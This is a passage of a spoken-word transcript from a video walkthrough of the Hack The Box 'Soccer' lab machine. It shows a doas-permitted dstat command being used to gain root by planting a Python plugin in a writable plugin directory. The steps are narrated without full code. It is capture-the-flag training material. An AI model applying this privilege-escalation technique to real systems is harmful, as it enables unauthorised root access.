- 00:33:38can run let's go to user share dstat
- 00:33:44was this the directory
- 00:33:46or a find
- 00:33:50user
- 00:33:51local share
- 00:33:53and this directory is interesting
- 00:33:55because we are the group owner of it so
- 00:33:58we can write to it so that's why it
- 00:34:00showed up in our find command
- 00:34:03and I'm going to write Please Subscribe
- 00:34:06dot pi
- 00:34:07and let's see
- 00:34:11let's do a less on we're entered
- 00:34:14directly before that was interesting
- 00:34:21does it use your share dstat yeah
- 00:34:23let's see dstat nfs3 dot pi
- 00:34:31see I wonder if we have to create a
- 00:34:33class and everything like this
- 00:34:36is this on GTFO bins
- 00:34:40let's check this first
- 00:34:44hey it is sudo
- 00:34:53so we just have to write a shell script
- 00:34:55in it okay so we don't have to do the
- 00:34:57class and over complicate it like it was
- 00:35:03we just name it dstat underscore XXX or
- 00:35:07whatever you want
- 00:35:08so v d stat please subscribe
- 00:35:14dot pi
- 00:35:16and we will
- 00:35:17import OS
- 00:35:20and then execute a script there right
- 00:35:25so if we now do the d-stat plugins
- 00:35:30let's see I think it was dash dash list
- 00:35:34we can see there is a please subscribe
- 00:35:37so if I just do D Scrap uh
- 00:35:41um
- 00:35:42d-stat and then dash dash the plug-in
- 00:35:44name we should be able to execute it
- 00:35:48and we'll also want to run do as before
- 00:35:50it
- 00:35:52uh operation not permitted
- 00:35:57let's see cat use a local Etsy do as
- 00:36:01let's see
- 00:36:03do I have to specify
- 00:36:05user Bend dstat
- 00:36:07there we go do ID and I am now root
- 00:36:11so I had to do the full path just
- 00:36:13because that's what the CMD had stated
- 00:36:16right so when I just did do as dstat it
- 00:36:20did not match what I was submitted to
- 00:36:22run so it didn't let me to but I put the
- 00:36:24full path there and
- 00:36:26I got in so we can go now and get
- 00:36:29root.txt and that is the box so hope you
- 00:36:32guys enjoy that take care and we'll see
- 00:36:33you all next time
标签
- Hack The Box
- Soccer
- Linux
- Penetration Testing
- SQL Injection
- dstat
- Privilege Escalation
- WebSocket
- PHP Shell
- Doas